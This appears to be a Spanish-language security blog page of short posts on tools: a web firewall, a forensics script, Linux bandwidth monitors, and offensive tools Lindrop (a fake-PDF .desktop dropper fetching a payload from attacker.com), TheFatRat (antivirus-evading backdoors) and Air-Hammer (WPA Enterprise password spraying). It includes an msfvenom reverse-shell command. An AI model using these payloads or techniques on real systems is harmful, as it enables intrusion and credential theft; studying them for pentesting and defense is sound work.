Ciber Seguridad General

RAPTOR WAF – UN FIREWALL GRATIS DE APLICACIONES WEB

Posted on

raptor-waf

Un firewall de aplicaciones web (WAF) es un firewall que supervisa seguridad web, filtra o bloquea el tráfico HTTP hacia y desde una aplicación Web.Un WAF también es capaz de detectar y prevenir nuevos ataques desconocidos al observar patrones desconocidos en los datos de tráfico. Raptor WAF es un firewall de aplicaciones web hecho en C, que usa DFA para ayudar en seguridad web y bloquear SQL Inyección, Cross Site Scripting (XSS) y PathTraversal.

Es esencialmente un firewall de aplicación web simple hecho en C, usando el principio KISS, haciendo poll utilizando la función select (), no es mejor que epoll () o kqueue () de BSD, pero es portátil.

Caracteristicas

Según los expertos de seguridad web de iicybersecurity, WAF como Raptor puede ser utilizado por PYMES para implementar seguridad web. Es ampliamente utilizado hoy en día para detectar y defenderse contra la mayoría de las inyecciones de SQL, ataques contra seguridad web y ataques XSS.

  • Bloquear ataques contra seguridad web como de XSS, Inyección de SQL y path traversal
  • Lista negra IPs para bloquear usuarios usando config / blacklist ip.txt
  • Soporta IPv6 e IPv4 para la comunicación

raptor-waf

 

https://github.com/CoolerVoid/raptor_waf

Advertisements

En la BMV, desprotegidas las firmas ante ciberataques

Posted on

los hackers consiguen hasta US600,000 millones al año por invasiones, según especialistas en el tema de ciberseguridad. Desprotegidas y sensibles ante un ataque cibernético. Así se encuentran las emisoras de la Bolsa Mexicana de Valores (BMV). Especialistas coincidieron en que un ataque a sus computadoras, redes e información podría mermar notablemente sus operaciones y afectar sus finanzas. Sin embargo, no se protegen adecuadamente.

Expertos en ataques cibernéticos coincidieron en que las empresas en general y en específico las que cotizan en Bolsa destinan bajo presupuesto a su protección cibernética.

Los sectores que más ataques cibernéticos reciben son el financiero y de comercio electrónico.

Datos del International Institute of Cyber Security indican que en el 2016 cerca de 78% de las empresas en México han sido blanco de un ataque por medio de Internet.

cyber

A pesar de que ha ido en incremento el presupuesto para dicha área, firmas que cotizan en la BMV destinan solamente entre 5 y 8% de su presupuesto a ciberseguridad, porcentaje menor al de las empresas que cotizan en Nasdaq, que destinan entre 7 y 11% de su presupuesto para protegerse de ciberataques.

Dicha institución recomienda a una empresa en Bolsa una inversión anual contra ataques cibernéticos de entre 700,000 a 30 millones de dólares.

Compromiso bajo “El nivel de compromiso para implementar ciberseguridad es bajo ya que sólo 45% de las empresas tiene una estrategia robusta de ciberseguridad y sólo 40% realiza evaluaciones regulares de ciberseguridad”, aseguró German Ruiz, consultor de Seguridad Cibernética-Ethical Hacking en International Institute of Cyber Security.

Marco DeMello, CEO de PSafe, aplicación de defensa contra ataques cibernéticos para teléfonos celulares, dijo que “todavía no están protegidas suficientemente las empresas contra un ciberataque. Son muy vulnerables. Y es que muy pocas empresas que son invadidas lo reportan, entonces no hay una legislación en América Latina para que las empresas que son comprometidas lo reporten al gobierno, no hay obligación legal, más que en Estados Unidos”.

Ruiz agregó que una empresa del tamaño de las que cotizan en Bolsa o internacionales recibe anualmente entre 2 a 10 millones de ataques cibernéticos, de los cuales, entre 2 y 5% son consumados.

Pérdidas millonarias

Sin embargo, a pesar de que el porcentaje es bajo, las pérdidas son cuantiosas a nivel mundial.

“El mercado de ataques cibernéticos en el mundo asciende a 600,000 millones de dólares, aunque dependen del tamaño de la empresa y tipo de negocio.

El costo por la reparación de daños es de entre 10,000 a 50,000 dólares para las pequeñas empresas y entre 50,000 a 150 millones de dólares, para las grandes”, consideró el consultor de Seguridad Cibernética.

 

IR-RESCUE: UNA HERRAMIENTA DE CÓDIGO ABIERTO PARA FORENSE Y RESPUESTA DE INCIDENTES

Posted on

Ir-rescue es un script ligero de Windows Batch que recopila unos numerosos de datos forenses de sistemas Windows de 32 bits y 64 bits respetando el orden de volatilidad y artefactos que se cambian con la ejecución del script. Se destina a la respuesta a incidentes utilizándose en diferentes etapas del proceso de digital forensic e investigación. Puede ser configurado para realizar colecciones completas de datos para fines de digital forensic e investigación, así como personalizar adquisiciones de tipos específicos de datos. La herramienta representa un esfuerzo para agilizar la recolección de datos de máquina, independientemente de las necesidades de la digital forensic y confiar menos en el soporte in sitio cuando el acceso remoto o el análisis en vivo no están disponibles.

Ir-rescue hace uso de comandos integrados de Windows y utilidades de terceros bien conocidas de Sysinternals y NirSoft, por ejemplo, algunas de código abierto. Está diseñada para agrupar las colecciones de datos según el tipo de datos. Por ejemplo, se agrupan todos los datos relacionados con la conexión en red, como los recursos compartidos de archivos abiertos y las conexiones TCP (Protocolo de control de la transmisión), mientras que los procesos, los servicios y las tareas se agrupan bajo malware. La herramienta de digital forensic también está diseñada con el propósito de no hacer uso de PowerShell y WMI (Windows Management Instrumentation) para que sea compatible transversalmente. La adquisición de tipos de datos y otras opciones generales se especifican en un archivo de configuración simple. Cabe señalar que el script lanza un gran número de comandos y herramientas, dejando una huella considerable en el sistema. El tiempo de ejecución varía dependiendo de la potencia de cálculo y de las configuraciones establecidas, aunque suele terminar dentro de un máximo de una hora si está configurado para ejecutarse completamente. Ir-rescue es una de las herramientas usada por los expertos de digital forensic de international institute of cyber security.

Ir-rescue ha sido escrito para la respuesta a incidentes y digital forensic, así como para los profesionales de la seguridad por igual. Por lo tanto, puede utilizarse para aprovechar las herramientas y comandos ya agrupados durante las actividades de digital forensic.

Ir-rescue se basa en una serie de utilidades de terceros para recopilar datos específicos de las maquinas. Las versiones de las herramientas se enumeran en la siguiente sección y se proporcionan con el paquete tal cual y, por lo tanto, sus licencias y acuerdos de usuario deben aceptarse antes de ejecutar ir-rescue.

Ir-rescue debe ejecutarse bajo una consola de línea de comandos con derechos de administrador y no requiere argumentos.

ir-rescue

ir-rescue

ir-rescue

 

LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX

Posted on

Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.

Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.

Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.

Básicamente explota la sección “Exec” de un archivo .desktop para:

  1. Descargue un PDF y muéstrelo al usuario.
  2. Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload

Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:

Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.

lindrop

Un nombre de salida para el archivo almacenado.

lindrop

Una URL de carga útil remota. (http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota  Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.

lindrop

En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.

lindrop

Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.

 

¿CÓMO GENERAR FÁCILMENTE UNA PUERTA TRASERA PARA LINUX, WINDOWS, MAC Y EVITAR EL ANTIVIRUS?

Posted on

thefatrat-tool1

Una puerta trasera es un medio de acceso a un programa informático que evita los mecanismos de ciberseguridad. Un programador de ciberseguridad algunas veces puede instalar una puerta trasera para que se pueda acceder al programa para solucionar problemas de ciberseguridad o para otros fines. Sin embargo, los atacantes suelen utilizar puertas traseras que se detectan o se instalan, como parte de una vulnerabilidad.

En este artículo vamos a discutir una herramienta con la ayuda de expertos de cloud security de iicybersecurity IICS. La herramienta se llama TheFatRat que puede ser utilizada para generar una puerta trasera para Linux, Windows, Mac y evitar AntiVirus.

Según expertos de ciberseguridad y cloud security, TheFatRat es una herramienta fácil de generar puerta trasera con msfvenom (una parte de metasploit Framework). Esta herramienta recopila un malware con una carga útil popular y luego el malware compilado se puede ejecutar en Windows, Mac, Android. El malware que se crea con esta herramienta también tiene la capacidad de pasar por alto la mayor parte de protección de software de Anti Virus. Según su creadores y expertos de ciberseguridad, la puerta trasera, se ejecuta automáticamente si la victima desactiva el uac (user acces control).

UAC es una característica de ciberseguridad de Windows Vista, Windows 7 y Windows 8, que ayuda a evitar cambios no autorizados en el equipo. Estos cambios pueden ser iniciados por aplicaciones, virus u otros usuarios. User Account Control se asegura de que estos cambios se realizan sólo con la aprobación por parte del administrador. Si los cambios no han sido aprobados por el administrador, ellos no se ejecutan y Windows se mantiene sin cambios. Es como si nada hubiera pasado menciona experto de cloud security.

La herramienta de ciberseguridad revisa el servicio de Metasploit y se inicia si no está presente y pueden crear fácilmente meterpreter reverse_tcp playloads para Windows, Linux, Android y Mac.

TheFatRat ha sido creado para hacer frente a los problemas generales que enfrentan los profesionales de ciberseguridad y cloud security. La herramienta se puede iniciar varias meterpreter reverse_tcp listners y hacer una búsqueda rápida en searchsploit.

Los expertos de ciberseguridad han estado utilizando esta herramienta para eludir antivirus, ejecutar Auto run script para los listeners.

Esta herramienta es parte de sistema operativo hacking ético, Dracos Linux

REQUERIMIENTOS

  • Un sistema operativo Linux. Expertos en ciberseguridad recomiendan Kali Linux 2 o Kali 2.016,1 rolling / Cyborg / Parrot / Dracos / BackTrack / Blackbox / y otro sistema operativo (Linux)
  • Debe instalar metasploit Framework

 

 

 

¿CÓMO MONITOREAR EL TRÁFICO DE RED EN LINUX?

Posted on

Con ayuda de expertos de ethical hacking y test de intrusión, en este artículo menciona algunas herramientas de línea de comandos de Linux que se pueden utilizar para monitorear el tráfico de red. Estas herramientas supervisan el tráfico que fluye a través de las interfaces de red y miden la velocidad a la que se están transfiriendo datos. El tráfico entrante y saliente se muestra por separado. Algunos de los comandos muestran el ancho de banda utilizado por los procesos individuales. Esto hace que sea fácil de detectar un proceso que este sobre utilizando en el ancho de banda de la red durante test de intrusión.

Aquí está una lista de los comandos, ordenadas según sus características

NLOAD

Nload es una herramienta de línea de comandos que permite a los usuarios controlar el tráfico entrante y saliente por separado. Que también atrae hacia afuera a un gráfico para indicar el mismo, la escala de los cuales se puede ajustar. Según curso de ethical hacking es muy fácil y sencillo de utilizar, y no es compatible con muchas opciones.

$ sudo apt-get install nload $ nload

netload

IFTOP

Iftop mide los datos que fluyen a través de conexiones de socket individuales, y funciona de una manera diferente de Nload. Aunque iftop informa el ancho de banda utilizado por las conexiones individuales, no puede informar nombre / identificación del proceso involucrados en la conexión de socket en particular. Sin embargo, basándose en la biblioteca pcap, iftop es capaz de filtrar el tráfico de ancho de banda e informar sobre las conexiones de host seleccionados según lo especificado por el filtro.

$ sudo apt-get install iftop $ sudo iftop -n

iftop

Según consultores de test de intrusión, la opción n previene a iftop de resolver direcciones IP a nombre del host, lo que causa tráfico de la red adicional a sí mismo.

IPTRAF

Iptraf es un monitor de LAN interactivo y colorido. Muestra las conexiones individuales y la cantidad de datos que fluyen entre los anfitriones y es usado por experto de ethical hacking. Aquí está una captura de pantalla

$ sudo apt-get install iptraf iptraf-ng $ sudo iptraf

iptraf

NETHOGS

Nethogs es una pequeña herramienta de ‘net top’ que muestra el ancho de banda utilizado por los procesos individuales y ordena la lista poniendo los procesos más intensivos en la parte superior. En el caso de un repentino aumento de ancho de banda, de forma rápida abre nethogs y encuentra el proceso responsable explican expertos de ethical hacking y test de intrusión. Nethogs informa de PID, el usuario y la ruta de acceso del programa.

$ sudo apt-get install nethogs $ sudo nethogs

nethogs

SLURM

Slurm es otro monitor de carga de red que muestra las estadísticas del dispositivo junto con un gráfico ASCII. Es compatible con 3 estilos diferentes de cada uno de los gráficos que se pueden activar. Simple en funciones, slurm no muestra más detalles sobre la carga de la red.

$ sudo apt-get install slurm $ slurm -s -i eth0

slurm

TCPTRACK

Tcptrack es similar a iftop, y utiliza la biblioteca pcap para capturar paquetes y calcular varias estadísticas como el ancho de banda utilizado en cada conexión explican expertos de ethical hacking y test de intrusión. También es compatible con los filtros pcap estándar que pueden ser utilizados para controlar las conexiones específicas.

$ sudo apt-get install tcptrack

tcptrack

VNSTAT

VnStat es poco diferente de la mayoría de las otras herramientas menciona Mike Stevens experto de test de intrusión de International Institute of Cyber Security. Esto realmente ejecuta un servicio en segundo plano / daemon y sigue grabando el tamaño de la transferencia de datos todo el tiempo. A continuación puede ser utilizado para generar un informe de la historia de uso de la red. VnStat es más como una herramienta para obtener informes históricos de cuánto ancho de banda se utiliza todos los días o durante el mes pasado. No es estrictamente una herramienta para el monitoreo de la red en tiempo real.

$ sudo apt-get install vnstat

vnstat

BWM-NG

BWM-ng (Bandwidth Monitor Next Generation) es otro monitor de carga de la red en tiempo real muy simple que reporta un resumen de la velocidad a la que se están transfiriendo datos dentro y fuera de todas las interfaces de red disponibles en el sistema.

$ bwm-ng

bwm-ng

CBM – COLOR BANDWIDTH METER

Un diminuto monitor simple de ancho de banda que muestra el volumen de tráfico a través de las interfaces de red. No hay más opciones, sólo las estadísticas de tráfico son la pantalla y actualizado en tiempo real.

$ sudo apt-get install cbm

cbm

SPEEDOMETER

Otra herramienta pequeña y sencilla que simplemente extrae buenos gráficos en busca de tráfico entrante y saliente durante test de intrusión a través de una interfaz dada.

$ sudo apt-get install speedomete $ speedometer -r eth0 -t eth0

speedometer

PKTSTAT

Pktstat muestra todas las conexiones activas en tiempo real, y la velocidad a la que se están transfiriendo datos a través de ellos y es usado por expertos de ethical hacking. También muestra el tipo de la conexión.

$ sudo apt-get install pktstat $ sudo pktstat -i eth0 -nt

pktstat

NETWATCH

Netwatch es parte de la colección de herramientas netdiag, y también muestra las conexiones entre el anfitrión local y otros equipos remotos, y la velocidad a la que se transfieren datos en cada conexión durante test de intrusión.

$ sudo apt-get install netdiag $ sudo netwatch -e eth0 –nt

netwatch

TRAFSHOW

Esto informa de las conexiones activas actuales, su protocolo y la velocidad de transferencia de datos en cada conexión. Sólo monitorea las conexiones TCP

$ sudo apt-get install netdiag $ sudo trafshow -i eth0 tcp

trafshow

NETLOAD

El comando Netload simplemente muestra un pequeño informe sobre la carga de tráfico actual y el número total de bytes transferidos desde el inicio del programa.

$ sudo apt-get install netdiag $ netload eth0

netload

DSTAT

Dstat es una herramienta versátil (escrito en Python por expertos de ethical hacking) que puede controlar diferentes estadísticas del sistema e informar de ellas en un modo de estilo de lotes o registrar los datos a un archivo CSV o similar. Este ejemplo muestra cómo utilizar dstat para reportar el ancho de banda de la red durante test de intrusión.

$ sudo apt-get install dstat$ dstat -nt

dstat

COLLECTL

Collectl informa de las estadísticas del sistema en un estilo y se recoge estadísticas sobre los diversos diferentes recursos del sistema como CPU, memoria, red, etc.

$ sudo apt-get install collectl$ collectl -sn -oT -i0.5

collectl

 

¿CÓMO HACKEAR LA RED WPA EMPRESARIAL CON AIR-HAMMER?

Posted on

Ataques de fuerza bruta en línea contra la red WPA empresarial que parecen ser pasadas por alto, si no desconocidas, en la literatura actual sobre la seguridad de la red inalámbrica y en la comunidad de seguridad o pentesting en general. Aunque la red WPA empresarial a menudo se considera “más seguro” que WPA-PSK, que también tiene una superficie de ataque mucho más grande según expertos de pruebas de penetración. Mientras que las redes WPA-PSK sólo tienen una contraseña válida, puede haber miles de combinaciones de nombre de usuario y una contraseña válida que conceda acceso a una única red WPA empresarial. Acuerdo a reportes de pentesting, las contraseñas utilizadas para acceder a red WPA empresarial están comúnmente seleccionadas por los usuarios finales, muchos de los cuales seleccionan contraseñas extremadamente comunes.

air-hammer

CÓMO FUNCIONA EL AIR HAMMER

Air Hammer requiere como mínimo los siguientes parámetros para un hacer ataque:

  • La interfaz inalámbrica para ser utilizada
  • El nombre de la red (SSID) de la red inalámbrica esté a la que está destinada durante pruebas de penetración.
  • Una lista de nombres de usuario objetivo
  • Una contraseña o una lista de contraseñas para ser analizados para cada nombre de usuario

Air Hammer entonces intenta la autenticación en la red objetivo al tratar la contraseña proporcionada con cada nombre de usuario en la lista. Si se proporciona más de una contraseña, cada nombre de usuario es intentado con la primera contraseña antes de pasar a la siguiente contraseña.

Los expertos de pentesting han creado Air Hammer y dicen que interactuar con los nombres de usuario en lugar de las contraseñas es ventajoso porque:

  1. Hay una probabilidad mucho más alta que podamos adivinar la contraseña de al menos uno, de entre todos los usuarios de la organización que la probabilidad de que podemos adivinar la contraseña de un usuario único, específico en la organización.
  2. Debido a la cuenta de políticas de bloqueo comúnmente en su lugar, es posible hacer muchas veces más intentos de conexión dentro de un plazo determinado mediante la difusión de ellas a través de múltiples cuentas de usuario.

Después se descubrió un conjunto válido de credenciales, el nombre de usuario y la contraseña se muestran en la pantalla. En función de los parámetros utilizados, las credenciales opcionalmente se pueden guardar en un archivo de salida, y el ataque puede ser terminado en el primer éxito o permitido que continúe.

CADENA DE ATAQUE TÍPICO DURANTE PENTESTING

La cadena de ataque típico durante pentesting para los ataques realizados con Aire-Hammer es la siguiente:

Identificar la red de destino y el mecanismo de autenticación en uso. La versión actual del Air Hammer sólo es compatible con PEAP / MSCHAPv2. Los investigadores de pruebas de penetración añadirán los mecanismos de autenticación adicionales en versiones futuras.

Generar una lista de nombres de usuario para su uso en el ataque. Identificar el formato de nombre de usuario utilizado por la organización. Las fuentes posibles incluyen:

  • Los nombres de usuarios almacenados dentro de los metadatos de los archivos disponibles en el sitio web de la empresa.
  • La primera mitad de direcciones de correo electrónico corporativo. (La parte antes de la “@”).
  • Los nombres de usuario capturados durante un ataque “Evil Twin” de la red destino.
  • Hacer una lista de los nombres y apellidos de los mayoria de los empleados de la organización como sea posible. Las fuentes posibles: 1. El sitio web empresarial 3. Data.com 3. LinkedIn
  • El uso de la información obtenida de los pasos anteriores durante pentesting, generara una lista de nombres de usuarios potenciales.

Uso de Air-Hammer para descubrir las credenciales válidas.

Uso de credenciales descubierto para acceder a la red inalámbrica.

Muchas empresas de pentesting usan herramientas como de Air Hammer para hacer pruebas de penetración. Los expertos de pentesting de IICS International Institute of Cyber Security mencionan que desde credenciales la empresa WPA que son a menudo de dominio de las credenciales del usuario, utilice las credenciales descubiertas para acceder a sistemas adicionales en la red interna e iniciar ataques adicionales.

air-hammer2-1

https://github.com/Wh1t3Rh1n0/air-hammer/